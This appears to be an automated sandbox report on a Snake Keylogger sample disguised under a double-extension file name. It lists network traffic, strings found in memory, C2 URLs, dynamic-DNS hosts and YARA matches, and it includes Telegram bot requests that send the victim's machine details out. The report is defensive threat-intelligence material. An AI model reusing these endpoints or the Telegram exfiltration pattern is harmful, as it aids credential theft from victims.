Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: awaratrendz.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://awaratrendz.com
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1451353095.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_010AD5DC 1_2_010AD5DC
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CCD2FB 1_2_09CCD2FB
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC9A58 1_2_09CC9A58
